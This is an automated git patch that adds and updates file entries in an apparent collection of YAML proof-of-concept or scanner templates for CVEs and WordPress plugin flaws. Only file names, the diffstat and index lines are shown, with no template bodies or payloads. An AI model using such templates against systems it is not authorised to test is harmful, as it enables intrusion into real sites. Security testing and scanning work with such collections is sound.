From afda931d08919edd5e76462be768bf9104ac6c8e Mon Sep 17 00:00:00 2001 
From: GitHub Action
Date: Fri, 13 Sep 2024 12:38:50 +0000
Subject: [PATCH] 20240913

---
 date.txt | 2 +-
 poc.txt | 113 +++++++++++++++
 poc/adobe/servudaemon-ini.yaml | 42 +++---
 ...-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml | 59 ++++++++
 ...-api-5aa30296a4f0ae648270a4e74d17b635.yaml | 59 ++++++++
 poc/auth/Mantis-Default_login.yaml | 5 +
 ...ager-d96b919b70e327f92b0707dadc93f77b.yaml | 59 ++++++++
 ...eets-2274954363ea101c579ff78257df6249.yaml | 59 ++++++++
 ...ogin-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml | 59 ++++++++
 ...2446-12288e54ea2799c2827efda4c629c56e.yaml | 59 ++++++++
 ...0068-23426c249d4590c183980f57ce680dee.yaml | 59 ++++++++
 ...7182-5df993839d8e6edf9fffc6cbdb77670b.yaml | 59 ++++++++
 ...3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml | 59 ++++++++
 ...8763-36ed147d9204dfa5b9ca29204c678752.yaml | 59 ++++++++
 ...3899-f75ea98633e652b4cb25f75a92267ca3.yaml | 59 ++++++++
 ...3255-91eefecce0a74f93379bfae7b9f8769a.yaml | 59 ++++++++
 ...5269-87676ca600bde6a78ec815da9ddc8eb7.yaml | 59 ++++++++
 ...5270-ff7911032b65570055c615564e945f75.yaml | 59 ++++++++
 ...5429-c5b50a2727f0a5beb04680b6d713ea8e.yaml | 59 ++++++++
 ...5625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml | 59 ++++++++
 ...5561-b3779d524422cb5f6e75ef5f028e49f8.yaml | 59 ++++++++
 ...5567-a55055fd86860f71a8b1255aa0514d09.yaml | 59 ++++++++
 ...5628-1341f1db3b0e886d8e7026974e839398.yaml | 59 ++++++++
 ...5789-aefcab5998ef352002c627c10b26cbb1.yaml | 59 ++++++++
 ...5867-c6c99bf3f91229f19ab5549c865f8aea.yaml | 59 ++++++++
 ...5869-611101c87cbed518f9857873a13fd418.yaml | 59 ++++++++
 ...5870-72d352e62d854d49b010539851855ac0.yaml | 59 ++++++++
 ...5884-52f9cdbe6dddeb2847b178967af0721e.yaml | 59 ++++++++
 ...6020-5176ea957ebdce07a35c57808b2e82fe.yaml | 59 ++++++++
 ...6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml | 59 ++++++++
 ...6792-caf9c03fac6a04307d723bd20d75de7c.yaml | 59 ++++++++
 ...6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml | 59 ++++++++
 ...6888-b452cc3f182752280bb057c3435438a7.yaml | 59 ++++++++
 ...6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml | 59 ++++++++
 ...6910-579d75d9cc4716699d11831eae3d5143.yaml | 59 ++++++++
 ...7132-a80035d85237acc3ef439cd2cd18c516.yaml | 59 ++++++++
 ...7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml | 59 ++++++++
 ...7423-beef10a23166777228f21f82780dd30d.yaml | 59 ++++++++
 ...7716-2ebb70230dde389a8f6f5a9c0160affa.yaml | 59 ++++++++
 ...7786-bad1bfe3a589408fe56217e3142344ed.yaml | 59 ++++++++
 ...7888-483a84d579a54e76d3a8b4799ba22e2b.yaml | 59 ++++++++
 ...7891-a07b427b3532ab45f1726dadba231414.yaml | 59 ++++++++
 ...7955-5e9fd490f09c7370ea858a067ee264fd.yaml | 59 ++++++++
 ...8031-f6e05cbf1fd3b18d02657892077c5da5.yaml | 59 ++++++++
 ...8242-cdbbac228ad219af93b654766e13b83b.yaml | 59 ++++++++
 ...8269-eb32a5853ffb2001bfd3e5a673037190.yaml | 59 ++++++++
 ...8656-1116395151f79029236816f9e11f544d.yaml | 59 ++++++++
 ...8663-483f5812b103f5a68eb659c586f798b2.yaml | 59 ++++++++
 ...8664-a1a28b91e5f96df0c76ded650a87a835.yaml | 59 ++++++++
 ...8665-d05eed41be11b2c07c036fabd71a8c1b.yaml | 59 ++++++++
 ...8714-03b5605b5eeba70097fb089d33700336.yaml | 59 ++++++++
 ...8730-efc3370bbeb807667af618ae74e58df1.yaml | 59 ++++++++
 ...8731-b5fad8172a537c5460328250b82e6ef6.yaml | 59 ++++++++
 ...8732-f30eab986c0f8516da683155679193fc.yaml | 59 ++++++++
 ...8734-0bca25c266f3dd7ab05ff586726bddcc.yaml | 59 ++++++++
 ...8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml | 59 ++++++++
 ...8742-40e6379c1e4c681d6815f3308854ba0d.yaml | 59 ++++++++
 ...8747-f757d510ac120bf89329e22a6153766c.yaml | 59 ++++++++
 poc/cve/cve-2005-3344.yaml | 28 +---
 poc/cve/cve-2010-0219.yaml | 29 +---
 poc/cve/cve-2016-1000136.yaml | 5 +-
 poc/cve/cve-2016-3978.yaml | 30 ++--
 poc/cve/cve-2017-11512.yaml | 20 +--
 poc/cve/cve-2017-18598.yaml | 88 ++++-------
 poc/cve/cve-2017-5631.yaml | 25 +---
 poc/cve/cve-2017-7269.yaml | 45 ++++++
 poc/cve/cve-2017-7529.yaml | 36 +++--
 poc/cve/cve-2017-9833.yaml | 27 +---
 poc/cve/cve-2018-1000226.yaml | 34 ++---
 poc/cve/cve-2018-1000671.yaml | 33 +++++
 poc/cve/cve-2018-10956.yaml | 27 +---
 poc/cve/cve-2018-12300.yaml | 31 ++---
 poc/cve/cve-2018-1247.yaml | 1 -
 poc/cve/cve-2018-12675.yaml | 18 +--
 poc/cve/cve-2018-14918.yaml | 21 +--
 poc/cve/cve-2018-16761.yaml | 20 +--
 poc/cve/cve-2018-19365.yaml | 31 ++---
 poc/cve/cve-2018-7602.yaml | 45 +++---
 poc/cve/cve-2018-7662.yaml | 30 +---
 poc/cve/cve-2018-9161.yaml | 22 +--
 poc/cve/cve-2019-10758.yaml | 34 ++---
 poc/cve/cve-2019-17503.yaml | 35 +++++
 poc/cve/cve-2019-5127.yaml | 47 +++++++
 poc/cve/cve-2019-6715.yaml | 30 ++++
 poc/cve/cve-2020-10547.yaml | 12 +-
 poc/cve/cve-2020-12447.yaml | 22 +--
 poc/cve/cve-2020-15050.yaml | 26 +---
 poc/cve/cve-2020-18268.yaml | 32 ++---
 poc/cve/cve-2020-26876.yaml | 15 +-
 poc/cve/cve-2020-27866.yaml | 7 +-
 poc/cve/cve-2020-35846.yaml | 9 +-
 poc/cve/cve-2020-36365.yaml | 30 ++--
 poc/cve/cve-2020-8644.yaml | 40 ++----
 poc/cve/cve-2020-8772.yaml | 86 ++----------
 poc/cve/cve-2020-9036.yaml | 6 +-
 poc/cve/cve-2021-20123.yaml | 30 ++--
 poc/cve/cve-2021-20150.yaml | 33 ++---
 poc/cve/cve-2021-20158.yaml | 35 ++---
 poc/cve/cve-2021-21311.yaml | 65 ++------
 poc/cve/cve-2021-24926.yaml | 25 +---
 poc/cve/cve-2021-24947.yaml | 31 ++---
 poc/cve/cve-2021-25074.yaml | 33 ++---
 poc/cve/cve-2021-25111.yaml | 24 +---
 poc/cve/cve-2021-41282.yaml | 49 +++----
 poc/cve/cve-2021-41691.yaml | 24 ++--
 poc/cve/cve-2021-4191.yaml | 24 +---
 poc/cve/cve-2021-45967.yaml | 29 +---
 poc/cve/cve-2022-0149.yaml | 27 +---
 poc/cve/cve-2022-0346.yaml | 23 +---
 poc/cve/cve-2022-0381.yaml | 56 ++------
 poc/cve/cve-2022-0591.yaml | 44 +----
 poc/cve/cve-2022-1598.yaml | 29 +---
 poc/cve/cve-2022-22963.yaml | 24 +---
 poc/cve/cve-2022-23134.yaml | 33 +----
 poc/cve/cve-2022-24124.yaml | 23 +---
 poc/cve/cve-2022-25216.yaml | 26 +---
 poc/cve/cve-2022-27849.yaml | 20 +--
 poc/cve/cve-2022-28363.yaml | 34 ++---
 poc/cve/cve-2022-28365.yaml | 27 ++--
 poc/cve/cve-2022-32444.yaml | 20 +--
 poc/cve/cve-2022-42889.yaml | 130 +++++++++--------
 poc/debug/laravel-debug-mode-405.yaml | 60 ++++----
 poc/default/Mantis-Default_login.yaml | 5 +
 poc/laravel/laravel-debug-mode-405.yaml | 60 ++++----
 ...-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml | 59 ++++++++
 ...-api-5aa30296a4f0ae648270a4e74d17b635.yaml | 59 ++++++++
 ...orms-dbba8836e7c63cb37d729f0bede3c08c.yaml | 59 ++++++++
 ...-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml | 59 ++++++++
 poc/other/Symantec-Messaging-Gateway.yaml | 10 +-
 ...auty-af9641ba5dc553a449654ef14a59f791.yaml | 59 ++++++++
 ...ider-47bcd81d4514b99552c241ecb59905d9.yaml | 59 ++++++++
 ...ting-ecc300d4a146eb5fa016a0c1753ad120.yaml | 59 ++++++++
 ...ocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml | 59 ++++++++
 ...mits-3783595ba4ef5e542f7f4b09997c59ec.yaml | 59 ++++++++
 ...cate-be1dd882c5127ca050d4475dd55704a0.yaml | 59 ++++++++
 ...code-be43cfd9d399fba1f8b44a6dac9327bb.yaml | 59 ++++++++
 ...lite-bb5f23aa595372d8f56de7733b43289d.yaml | 59 ++++++++
 ...lite-07659033abd50bc07bbb85d0c2c40ea8.yaml | 59 ++++++++
 ...lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml | 59 ++++++++
 ...tact-628f849b35a63914cc2a2dfc18459221.yaml | 59 ++++++++
 ...ator-1007572ad74a1525d3e599dfc0947e74.yaml | 59 ++++++++
 ...jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml | 59 ++++++++
 ...lace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml | 59 ++++++++
 ...orly-2046cef31a20a206df02f665f01316a1.yaml | 59 ++++++++
 poc/other/parametros-preguicosos.yaml | 59 ++++++++
 ...ator-501ab9fae6b71897e59ae34630113849.yaml | 59 ++++++++
 ...aker-699c5ccba8a85c1a969fe9ae0872dda6.yaml | 59 ++++++++
 ...tion-5e0d9df78ac9d4442faef8b580ff6a03.yaml | 59 ++++++++
 ...tion-a6226aec94d543dc2c23085879e76e28.yaml | 59 ++++++++
 ...oads-5b228709f387f8ae0d1b397d9bc429ac.yaml | 59 ++++++++
 poc/other/sitemap.yaml | 75 +++++-----
 ...rbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml | 59 ++++++++
 ...ream-42c36199990b21951ee1ae2816559fc3.yaml | 59 ++++++++
 ...ker5-7499f94acf789ea7420fecd8147fd86f.yaml | 59 ++++++++
 ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++
 ...7182-5df993839d8e6edf9fffc6cbdb77670b.yaml | 59 ++++++++
 ...3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml | 59 ++++++++
 ...5625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml | 59 ++++++++
 ...5628-1341f1db3b0e886d8e7026974e839398.yaml | 59 ++++++++
 ...5884-52f9cdbe6dddeb2847b178967af0721e.yaml | 59 ++++++++
 ...6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml | 59 ++++++++
 ...7891-a07b427b3532ab45f1726dadba231414.yaml | 59 ++++++++
 ...8242-cdbbac228ad219af93b654766e13b83b.yaml | 59 ++++++++
 ...heme-2738eb196d5cf7002027db186214d929.yaml | 59 ++++++++
 ...ider-2fe9ad7647c04f89fbdba50824aa349b.yaml | 59 ++++++++
 ...fier-b42fe76d662d705db55d79a49ebb4329.yaml | 59 ++++++++
 ...lder-fde4dbc1536b247a205ddac8a2a684c9.yaml | 59 ++++++++
 ...ider-6788144065d375977e89ac972dbadb54.yaml | 59 ++++++++
 ...oles-270e3fdb06570cfef003e572f24bd104.yaml | 59 ++++++++
 ...orms-dbba8836e7c63cb37d729f0bede3c08c.yaml | 59 ++++++++
 ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++
 ...lite-56db9447fe27bdd7df2cf18aa839dda3.yaml | 59 ++++++++
 ...free-2b58d77210c6a77720f0b93f6e969f27.yaml | 59 ++++++++
 ...cewp-93f0a57183ff79e378986791039cd4c0.yaml | 59 ++++++++
 ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++
 ...itor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml | 59 ++++++++
 ...ndar-34f4a1a718c60d12e4d96b373b4a77ce.yaml | 59 ++++++++
 ...mail-d972e6fc6b9fbf14ec77704417abbfe0.yaml | 59 ++++++++
 ...like-5dc71d194ef6b07e577c2653b00da476.yaml | 59 ++++++++
 ...lper-3e174cda9ee64e9ecefee07080044ff5.yaml | 59 ++++++++
 180 files changed, 7337 insertions(+), 1402 deletions(-)
 create mode 100644 poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
 create mode 100644 poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
 create mode 100644 poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml
 create mode 100644 poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml
 create mode 100644 poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml
 create mode 100644 poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml
 create mode 100644 poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml
 create mode 100644 poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml
 create mode 100644 poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml
 create mode 100644 poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml
 create mode 100644 poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml
 create mode 100644 poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml
 create mode 100644 poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml
 create mode 100644 poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml
 create mode 100644 poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml
 create mode 100644 poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml
 create mode 100644 poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml
 create mode 100644 poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml
 create mode 100644 poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml
 create mode 100644 poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml
 create mode 100644 poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml
 create mode 100644 poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml
 create mode 100644 poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml
 create mode 100644 poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml
 create mode 100644 poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml
 create mode 100644 poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml
 create mode 100644 poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml
 create mode 100644 poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml
 create mode 100644 poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml
 create mode 100644 poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml
 create mode 100644 poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml
 create mode 100644 poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml
 create mode 100644 poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml
 create mode 100644 poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml
 create mode 100644 poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml
 create mode 100644 poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml
 create mode 100644 poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml
 create mode 100644 poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml
 create mode 100644 poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
 create mode 100644 poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml
 create mode 100644 poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
 create mode 100644 poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml
 create mode 100644 poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml
 create mode 100644 poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml
 create mode 100644 poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml
 create mode 100644 poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml
 create mode 100644 poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
 create mode 100644 poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml
 create mode 100644 poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml
 create mode 100644 poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml
 create mode 100644 poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml
 create mode 100644 poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml
 create mode 100644 poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml
 create mode 100644 poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml
 create mode 100644 poc/cve/cve-2017-7269.yaml
 create mode 100644 poc/cve/cve-2018-1000671.yaml
 create mode 100644 poc/cve/cve-2019-17503.yaml
 create mode 100644 poc/cve/cve-2019-5127.yaml
 create mode 100644 poc/cve/cve-2019-6715.yaml
 create mode 100644 poc/microsoft/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
 create mode 100644 poc/microsoft/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
 create mode 100644 poc/microsoft/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml
 create mode 100644 poc/microsoft/sensei-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml
 create mode 100644 poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml
 create mode 100644 poc/other/carousel-slider-47bcd81d4514b99552c241ecb59905d9.yaml
 create mode 100644 poc/other/classified-listing-ecc300d4a146eb5fa016a0c1753ad120.yaml
 create mode 100644 poc/other/coblocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml
 create mode 100644 poc/other/custom-post-limits-3783595ba4ef5e542f7f4b09997c59ec.yaml
 create mode 100644 poc/other/delicate-be1dd882c5127ca050d4475dd55704a0.yaml
 create mode 100644 poc/other/email-obfuscate-shortcode-be43cfd9d399fba1f8b44a6dac9327bb.yaml
 create mode 100644 poc/other/envira-gallery-lite-bb5f23aa595372d8f56de7733b43289d.yaml
 create mode 100644 poc/other/essential-addons-for-elementor-lite-07659033abd50bc07bbb85d0c2c40ea8.yaml
 create mode 100644 poc/other/eventon-lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml
 create mode 100644 poc/other/floating-contact-628f849b35a63914cc2a2dfc18459221.yaml
 create mode 100644 poc/other/forminator-1007572ad74a1525d3e599dfc0947e74.yaml
 create mode 100644 poc/other/leira-cron-jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml
 create mode 100644 poc/other/lucas-string-replace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml
 create mode 100644 poc/other/neighborly-2046cef31a20a206df02f665f01316a1.yaml
 create mode 100644 poc/other/parametros-preguicosos.yaml
 create mode 100644 poc/other/pdf-thumbnail-generator-501ab9fae6b71897e59ae34630113849.yaml
 create mode 100644 poc/other/popup-maker-699c5ccba8a85c1a969fe9ae0872dda6.yaml
 create mode 100644 poc/other/secure-copy-content-protection-5e0d9df78ac9d4442faef8b580ff6a03.yaml
 create mode 100644 poc/other/secure-copy-content-protection-a6226aec94d543dc2c23085879e76e28.yaml
 create mode 100644 poc/other/secure-downloads-5b228709f387f8ae0d1b397d9bc429ac.yaml
 create mode 100644 poc/other/starbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml
 create mode 100644 poc/other/stream-42c36199990b21951ee1ae2816559fc3.yaml
 create mode 100644 poc/other/tweaker5-7499f94acf789ea7420fecd8147fd86f.yaml
 create mode 100644 poc/search/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 create mode 100644 poc/sql/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml
 create mode 100644 poc/sql/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml
 create mode 100644 poc/sql/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml
 create mode 100644 poc/sql/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml
 create mode 100644 poc/sql/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml
 create mode 100644 poc/sql/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml
 create mode 100644 poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml
 create mode 100644 poc/sql/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
 create mode 100644 poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml
 create mode 100644 poc/sql/carousel-slider-2fe9ad7647c04f89fbdba50824aa349b.yaml
 create mode 100644 poc/sql/exit-notifier-b42fe76d662d705db55d79a49ebb4329.yaml
 create mode 100644 poc/sql/fusion-builder-fde4dbc1536b247a205ddac8a2a684c9.yaml
 create mode 100644 poc/sql/gs-logo-slider-6788144065d375977e89ac972dbadb54.yaml
 create mode 100644 poc/sql/leira-roles-270e3fdb06570cfef003e572f24bd104.yaml
 create mode 100644 poc/sql/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml
 create mode 100644 poc/sql/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 create mode 100644 poc/sql/triton-lite-56db9447fe27bdd7df2cf18aa839dda3.yaml
 create mode 100644 poc/web/web-directory-free-2b58d77210c6a77720f0b93f6e969f27.yaml
 create mode 100644 poc/wordpress/slicewp-93f0a57183ff79e378986791039cd4c0.yaml
 create mode 100644 poc/wordpress/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 create mode 100644 poc/wordpress/wp-editor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml
 create mode 100644 poc/wordpress/wp-simple-booking-calendar-34f4a1a718c60d12e4d96b373b4a77ce.yaml
 create mode 100644 poc/wordpress/wp-test-email-d972e6fc6b9fbf14ec77704417abbfe0.yaml
 create mode 100644 poc/wordpress/wp-ulike-5dc71d194ef6b07e577c2653b00da476.yaml
 create mode 100644 poc/wordpress/wpcodefactory-helper-3e174cda9ee64e9ecefee07080044ff5.yaml

diff --git a/date.txt b/date.txt
index 8dcf10768e..bc24009907 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240912
+20240913
diff --git a/poc.txt b/poc.txt
index 2eedc14fb3..23f0dc8aa2 100644
--- a/poc.txt
+++ b/poc.txt
@@ -1234,8 +1234,10 @@
 ./poc/api/mstore-api-1c2cd9ed5c2d1dcf576fe7aecb5ca226.yaml
 ./poc/api/mstore-api-319cdcd8aefa6dfb47435662ea3be489.yaml
 ./poc/api/mstore-api-3678a5cbd624bf906b9f1499b42e328d.yaml
+./poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
 ./poc/api/mstore-api-3bbe1e9b2827123550346928e2f78aea.yaml
 ./poc/api/mstore-api-47e384bbd4951ebb4d217ea16a357447.yaml
+./poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
 ./poc/api/mstore-api-6455a4c18e211ec9c979086a333e3980.yaml
 ./poc/api/mstore-api-6a7c29035944a1901b23ef2195208fe3.yaml
 ./poc/api/mstore-api-79265025e2ae87c5e5adf65c0d03eeec.yaml
@@ -3767,6 +3769,7 @@
 ./poc/auth/login-rebuilder.yaml
 ./poc/auth/login-recaptcha-f9f2c15f1d2609deb00e84bb916415e9.yaml
 ./poc/auth/login-recaptcha.yaml
+./poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml
 ./poc/auth/login-screen-manager-f2ebb2bced0f8fa6daae5365c8836e32.yaml
 ./poc/auth/login-screen-manager.yaml
 ./poc/auth/login-sidebar-widget-9391ea35c1f441dfd2f444fdf3bafc64.yaml
@@ -4869,6 +4872,7 @@ ./poc/auth/showdoc-default-password.yaml ./poc/auth/showdoc-default-password.yml ./poc/auth/sign-up-sheets-1a6bc6a5a2c08c5e6e6543ee5950eb9e.yaml +./poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml ./poc/auth/sign-up-sheets-37dbcb1f7bd48f11c063a32fe62ce9d8.yaml ./poc/auth/sign-up-sheets-4cfd3ee2304849a528ea45a428b1f377.yaml ./poc/auth/sign-up-sheets-79815b18051a852a7c88fb7eaae91d13.yaml @@ -5720,6 +5724,7 @@ ./poc/auth/xxljob-executor-unauth.yaml ./poc/auth/yealink-default-login.yaml ./poc/auth/yealinkpreauthrce(1).yaml +./poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml ./poc/auth/yith-custom-login-9828ed878d121d268e86215520b51df0.yaml ./poc/auth/yith-custom-login.yaml ./poc/auth/yith-easy-login-register-popup-for-woocommerce-af03f00eafbcbe5e2d95aac25b61c1ec.yaml @@ -20138,6 +20143,7 @@ ./poc/cve/CVE-2022-2444.yaml ./poc/cve/CVE-2022-2445-2ab79483ecb27e775838b2914c2ff86e.yaml ./poc/cve/CVE-2022-2445.yaml +./poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml ./poc/cve/CVE-2022-2448-0af5df1738f51aa31a5a88073f6afaa4.yaml ./poc/cve/CVE-2022-2448.yaml ./poc/cve/CVE-2022-2449-74fbb953a2601d563a5e25e71dc44f8a.yaml @@ -28212,6 +28218,7 @@ ./poc/cve/CVE-2023-40011-b5590cfb303a6bd14071f54aa7a5c86c.yaml ./poc/cve/CVE-2023-40011.yaml ./poc/cve/CVE-2023-40044.yaml +./poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml ./poc/cve/CVE-2023-40068-b461d5b89b24b251c1525611a31c2ffc.yaml ./poc/cve/CVE-2023-40068.yaml ./poc/cve/CVE-2023-4013-22b43f8b9be49b5526e1e59257e0706e.yaml @@ -29592,6 +29599,7 @@ ./poc/cve/CVE-2023-47180.yaml ./poc/cve/CVE-2023-47181-9c0be9e81dccc2f58c0f69f40f8eb124.yaml ./poc/cve/CVE-2023-47181.yaml +./poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml ./poc/cve/CVE-2023-47182.yaml ./poc/cve/CVE-2023-47183-e3ce4d4a55dedc39984f57ee90d97593.yaml ./poc/cve/CVE-2023-47183.yaml 
@@ -38625,6 +38633,7 @@ ./poc/cve/CVE-2024-3671.yaml ./poc/cve/CVE-2024-3672-ca9ab6267807f7244bff8128b2dae6aa.yaml ./poc/cve/CVE-2024-3672.yaml +./poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml ./poc/cve/CVE-2024-3674-f8f0b109f3145321593d24900c5cc332.yaml ./poc/cve/CVE-2024-3674.yaml ./poc/cve/CVE-2024-3675-ab9d70a2aa7a1cb36dd2d6bcc86d91eb.yaml @@ -39572,6 +39581,7 @@ ./poc/cve/CVE-2024-38761.yaml ./poc/cve/CVE-2024-38762-5bc9b1c949da89aac05601671afecbf2.yaml ./poc/cve/CVE-2024-38762.yaml +./poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml ./poc/cve/CVE-2024-38763-bbe5f07a8050f985b6906c6853591f21.yaml ./poc/cve/CVE-2024-38763.yaml ./poc/cve/CVE-2024-38764-8d2c8a2991c868644602fac1922489b2.yaml @@ -39663,6 +39673,7 @@ ./poc/cve/CVE-2024-3896.yaml ./poc/cve/CVE-2024-3897-46d1fe2e9d16e9d37f92404a3ccb2bbb.yaml ./poc/cve/CVE-2024-3897.yaml +./poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml ./poc/cve/CVE-2024-3903-cd897961c23f09c84cf4c805374a27a9.yaml ./poc/cve/CVE-2024-3903.yaml ./poc/cve/CVE-2024-3915-7659a2687c6966f355d82a6a63bbd9c1.yaml @@ -40299,6 +40310,7 @@ ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml ./poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml ./poc/cve/CVE-2024-43254.yaml +./poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml ./poc/cve/CVE-2024-43255.yaml ./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml @@ -40907,6 +40919,8 @@ ./poc/cve/CVE-2024-4489.yaml ./poc/cve/CVE-2024-4490-a71279b5729f40993764b7f4a01c6356.yaml ./poc/cve/CVE-2024-4490.yaml 